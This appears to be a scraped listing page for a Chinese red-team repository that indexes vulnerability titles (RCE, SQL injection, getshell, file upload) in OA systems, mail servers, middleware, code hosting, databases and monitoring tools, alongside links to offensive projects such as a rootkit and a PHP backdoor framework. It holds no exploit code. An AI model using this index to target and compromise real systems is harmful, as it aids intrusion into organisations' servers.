r0eXpeR / Redteam_vul
红队作战中比较常遇到的一些重点系统漏洞整理。
Stars: ✭ 1,271
Projects that are alternatives of or similar to Redteam vul
Payloadsallthethings
A list of useful payloads and bypass for Web Application Security and Pentest/CTF
Stars: ✭ 32,909 (+2489.22%)
Mutual labels: hacking, redteam
Aboutsecurity
A list of payload and bypass lists for penetration testing and red team infrastructure build.
Stars: ✭ 166 (-86.94%)
Mutual labels: hacking, redteam
Remote Desktop Caching
This tool allows one to recover old RDP (mstsc) session information in the form of broken PNG files. These PNG files allows Red Team member to extract juicy information such as LAPS passwords or any sensitive information on the screen. Blue Team member can reconstruct PNG files to see what an attacker did on a compromised host. It is extremely useful for a forensics team to extract timestamps after an attack on a host to collect evidences and perform further analysis.
Stars: ✭ 171 (-86.55%)
Mutual labels: hacking, redteam
A Red Teamer Diaries
RedTeam/Pentest notes and experiments tested on several infrastructures related to professional engagements.
Stars: ✭ 382 (-69.94%)
Mutual labels: hacking, redteam
Bettercap
The Swiss Army knife for 802.11, BLE, IPv4 and IPv6 networks reconnaissance and MITM attacks.
Stars: ✭ 10,735 (+744.61%)
Mutual labels: hacking, redteam
Diamorphine
LKM rootkit for Linux Kernels 2.6.x/3.x/4.x/5.x (x86/x86_64 and ARM64)
Stars: ✭ 725 (-42.96%)
Mutual labels: hacking, redteam
Lockdoor Framework
🔐 Lockdoor Framework : A Penetration Testing framework with Cyber Security Resources
Stars: ✭ 677 (-46.73%)
Mutual labels: hacking, redteam
Redteam Hardware Toolkit
🔺 Red Team Hardware Toolkit 🔺
Stars: ✭ 163 (-87.18%)
Mutual labels: hacking, redteam
Pentesting Bible
Learn ethical hacking.Learn about reconnaissance,windows/linux hacking,attacking web technologies,and pen testing wireless networks.Resources for learning malware analysis and reverse engineering.
Stars: ✭ 8,981 (+606.61%)
Mutual labels: hacking, redteam
Awesome Mobile Security
An effort to build a single place for all useful android and iOS security related stuff. All references and tools belong to their respective owners. I'm just maintaining it.
Stars: ✭ 1,837 (+44.53%)
Mutual labels: hacking, redteam
Ntlmrecon
Enumerate information from NTLM authentication enabled web endpoints 🔎
Stars: ✭ 252 (-80.17%)
Mutual labels: hacking, redteam
Collection Document
Collection of quality safety articles. Awesome articles.
Stars: ✭ 1,387 (+9.13%)
Mutual labels: hacking, redteam
Nishang
Nishang - Offensive PowerShell for red team, penetration testing and offensive security.
Stars: ✭ 5,943 (+367.58%)
Mutual labels: hacking, redteam
Intranet penetration cheetsheets
做redteam时使用,修改自Ridter的https://github.com/Ridter/Intranet_Penetration_Tips
Stars: ✭ 29 (-97.72%)
Mutual labels: hacking, redteam
Phpsploit
Full-featured C2 framework which silently persists on webserver with a single-line PHP backdoor
Stars: ✭ 1,188 (-6.53%)
Mutual labels: hacking, redteam
Geo Recon
An OSINT CLI tool desgined to fast track IP Reputation and Geo-locaton look up for Security Analysts.
Stars: ✭ 82 (-93.55%)
Mutual labels: hacking
红队中易被攻击的一些重点系统漏洞整理
以下时间为更新时间,不代表漏洞发现时间.带 ⚒️图标的为工具URL.
配合EHole(棱洞)-红队重点攻击系统指纹探测工具使用效果更佳:https://github.com/EdgeSecurityTeam/EHole
此项目同步至:https://forum.ywhack.com/bountytips.php?Vulnerability
一、OA系统
泛微(Weaver-Ecology-OA)
- [2021.01.07] - 泛微OA E-cology RCE(CNVD-2019-32204) - 影响版本7.0/8.0/8.1/9.0
- [2021.01.07] - 泛微OA WorkflowCenterTreeData接口注入(限oracle数据库)
- [2021.01.07] - 泛微ecology OA数据库配置信息泄露
- [2021.01.07] - 泛微OA云桥任意文件读取 - 影响2018-2019 多个版本
- [2021.01.07] - 泛微 e-cology OA 前台SQL注入漏洞
- [2021.01.07] - 泛微OA系统 com.eweaver.base.security.servlet.LoginAction 参数keywordid SQL注入漏洞
- [2021.01.07] - 泛微 OA sysinterface/codeEdit.jsp 页面任意文件上传
- [2021.01.07] - 泛微ecology OA数据库配置信息泄露
致远(Seeyon)
- [2021.01.07] - 致远 OA A8 htmlofficeservlet getshell 漏洞
- [2021.01.07] - 致远OA Session泄漏漏洞
- [2021.01.07] - 致远OA A6 search_result.jsp sql注入漏洞
- [2021.01.07] - 致远OA A6 setextno.jsp sql注入漏洞
- [2021.01.07] - 致远OA A6 重置数据库账号密码漏洞
- [2021.01.07] - 致远OA A8 未授权访问
- [2021.01.07] - 致远OA A8-v5 任意用户密码修改
- [2021.01.07] - 致远OA A8-m 后台万能密码
- [2021.01.07] - 致远OA 帆软报表组件 前台XXE漏洞
- [2021.01.07] - 致远OA帆软报表组件反射型XSS&SSRF漏洞 - Thinks:@LandGrey
蓝凌OA
- [2021.01.07] - 暂无(希望大佬能提供)
通达OA(TongDa OA)
- [2021.01.07] - 通达OA任意文件删除&文件上传RCE分析(2020年hw 8月0day)
- [2021.01.07] - 通达OA任意文件上传/文件包含GetShell
- [2021.01.07] - 通达OA <11.5版本 任意用户登录
- [2021.01.07] - 通达OA 11.2后台getshell
- [2021.01.07] - 通达OA 11.7 后台sql注入getshell漏洞
- [2021.03.06] - 通达OA 11.7 未授权RCE
- [2021.03.09] - 通达OA 11.8 后台低权限Getshell
- [2021.03.07] - ⚒️TDOA_RCE 通达OA综合利用工具
金蝶OA(Kingdee OA)
- [2021.01.07] - 金蝶协同办公系统 GETSHELL漏洞
二、E-mail
Exchange
- [2021.01.07] - CVE-2020-17083 Microsoft Exchange Server 远程执行代码漏洞
- [2021.01.07] - Microsoft Exchange远程代码执行漏洞(CVE-2020-16875)
- [2021.01.07] - CVE-2020-0688_微软EXCHANGE服务的远程代码执行漏洞
- [2021.01.07] - Microsoft Exchange任意用户伪造漏洞
- [2021.03.08] - ⚒️Microsoft Exchange SSRF(CVE-2021-26855)
- [2021.01.07] - Exchange 历史漏洞合集
- [2021.03.10] - Microsoft Exchange Proxylogon漏洞利用链
Coremail
- [2021.01.07] - Coremail 配置信息泄露及接口未授权漏洞
- [2021.01.07] - Coremail 存储型XSS漏洞
- [2021.01.07] - Coremail 历史漏洞合集
三、Web中间件
Apache
- [2021.01.07] - Apache Solr RCE—【CVE-2019-0192】
- [2021.01.07] - CVE-2018-1335:Apache Tika 命令注入
- [2021.01.07] - Apache Axis1(<=1.4版本) RCE
- [2021.01.07] - Tomcat信息泄漏和远程代码执行漏洞【CVE-2017-12615/CVE-2017-12616】
- [2021.01.07] - Tomcat Ghostcat - AJP协议文件读取/文件包含漏洞
- [2021.01.07] - Tomcat全版本命令执行漏洞 CVE-2019-0232
- [2021.01.07] - Tomcat后台部署war木马getshell
- [2021.01.07] - CVE-2016-1240 Tomcat本地提权漏洞
- [2021.01.07] - Tomcat历史漏洞合集
Weblogic
- [2021.01.07] - CVE-2020-14882 Weblogic 未授权绕过RCE
- [2021.01.07] - Weblogic 远程命令执行漏洞分析(CVE-2019-2725)
- [2021.01.07] - CVE-2019-2618任意文件上传漏洞
- [2021.01.07] - WebLogic XMLDecoder反序列化漏洞(CVE-2017-10271)
- [2021.01.07] - Weblogic任意文件读取漏洞(CVE-2019-2615)与文件上传漏洞(CVE-2019-2618)
- [2021.01.07] - Weblogic coherence组件iiop反序列化漏洞 (CVE-2020-14644)
- [2021.03.07] - WebLogic CVE-2020-14756 T3/IIOP 反序列化RCE
- [2021.03.07] - Weblogic Server远程代码执行漏洞(CVE-2021-2109)
- [2021.01.07] - Weblogic历史漏洞合集
- [2021.03.09] - ⚒️WeblogicScan Weblogic一键漏洞检测工具
JBoss
- [2021.01.07] - CVE-2017-7504-JBoss JMXInvokerServlet 反序列化
- [2021.01.07] - JBoss 5.x/6.x 反序列化漏洞(CVE-2017-12149)
- [2021.01.07] - JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)
- [2021.01.07] - JBOSS远程代码执行漏洞
- [2021.01.07] - JBoss JMX Console未授权访问Getshell
- [2021.01.07] - JBoss历史漏洞合集
- [2021.03.10] - ⚒️JbossScan 一个简单探测jboss漏洞的工具
四、源代码管理
GitLab
- [2021.01.07] - GitLab任意文件读取漏洞 CVE-2020-10977
- [2021.01.07] - GitLab 远程代码执行漏洞 -【CVE-2018-14364】
- [2021.01.07] - GitLab 任意文件读取 (CVE-2016-9086) 和任意用户token泄露漏洞
- [2021.01.07] - GitLab历史漏洞合集
SVN
- [2021.01.07] - SVN源码泄露漏洞
- [2021.03.09] - ⚒️svnExploit 支持SVN源代码泄露全版本Dump源码
五、项目管理系统
禅道
- [2021.01.07] - 【组件攻击链】禅道项目管理系统(ZenTaoPMS)高危漏洞分析与利用
- [2021.01.07] - CNVD-C-2020-121325 禅道开源版文件上传漏洞
- [2021.01.07] - 禅道9.1.2 免登陆SQL注入漏洞
- [2021.01.07] - 禅道 ≤ 12.4.2 后台管理员权限Getshell
- [2021.01.07] - 禅道9.1.2 权限控制逻辑漏洞
- [2021.01.07] - 禅道826版本一定条件getshell
- [2021.01.07] - 禅道远程代码执行漏洞
- [2021.01.07] - 禅道11.6任意文件读取
Jira
- [2021.01.07] - Atlassian Jira漏洞大杂烩
- [2021.01.07] - Jira服务工作台路径遍历导致的敏感信息泄露漏洞(CVE-2019-14994)
- [2021.01.07] - Jira未授权SSRF漏洞(CVE-2019-8451)
- [2021.01.07] - Atlassian JIRA服务器模板注入漏洞(CVE-2019-11581)
- [2021.01.07] - CVE-2019-8449 JIRA 信息泄漏漏洞
- [2021.01.07] - ⚒️遇到Jira时可以尝试的一些CVE
- [2021.01.07] - Jira历史漏洞合集
六、数据库
- [2021.03.09] - ⚒️MDAT 多种主流的数据库攻击利用工具
Redis
- [2021.01.07] - Redis未授权访问漏洞利用总结
- [2021.01.07] - Redis 4.x RCE
- [2021.01.07] - redis利用姿势收集
- [2021.01.07] - Redis历史漏洞合集
- [2021.03.08] - ⚒️通过 Redis 主从写出无损文件
Mysql
- [2021.01.07] - Mysql提权(CVE-2016-6663、CVE-2016-6664组合实践)
- [2021.01.07] - Mysql数据库渗透及漏洞利用总结
- [2021.01.07] - Mysql 注入专辑
- [2021.01.07] - 高版本MySQL之UDF提权
- [2021.03.08] - Mysql历史漏洞合集
Mssql
- [2021.01.07] - Mssql利用姿势整理(整理的比较全)
- [2021.01.07] - Mssql数据库命令执行总结
- [2021.01.07] - 利用mssql模拟登录提权
- [2021.01.07] - 高级的MSSQL注入技巧
- [2021.03.08] - MSSQL使用CLR程序集来执行命令
七、开源运维监控
Jenkins
- [2021.03.10] - Jenkins 路径遍历任意文件写入漏洞(CVE-2019-10352)
- [2021.03.10] - Jenkins Git client插件命令执行漏洞(CVE-2019-10392)
- [2021.03.10] - Jenkins 历史漏洞利用程序
Zabbix
- [2021.03.10] - CVE-2020-11800 Zabbix 远程代码执行漏洞
- [2021.03.10] - Zabbix 中的CSRF到RCE(CVE-2021-27927)
- [2021.03.10] - Zabbix 2.2 - 3.0.3 远程代码执行漏洞
- [2021.03.10] - Zabbix Agent 3.0.1 mysql.size shell命令注入 (CVE-2016-4338)
- [2021.03.10] - Zabbix 历史漏洞利用程序
Nagios
- [2021.03.10] - Nagios XI 5.6.9 远程代码执行漏洞(CVE-2019-20197)
- [2021.03.10] - nagios-xi-5.7.5 多个漏洞(CVE-2021-25296~99)
- [2021.03.10] - Nagios 代码注入漏洞 (CVE-2021-3273)
- [2021.03.10] - Nagios XI 5.5.10: XSS to RCE
- [2021.03.10] - Nagios 历史漏洞利用程序
八、堡垒机
JumpServer
- [2021.03.10] - JumpServer远程执行漏洞(2021.01)
齐治堡垒机
- [2021.03.10] - 齐治堡垒机未授权RCE
- [2021.03.10] - 齐治堡垒机远程代码执行
此项目不定期进行更新......
Note that the project description data, including the texts, logos, images, and/or trademarks,
for each open source project belongs to its rightful owner.
If you wish to add or remove any projects, please contact us at [email protected].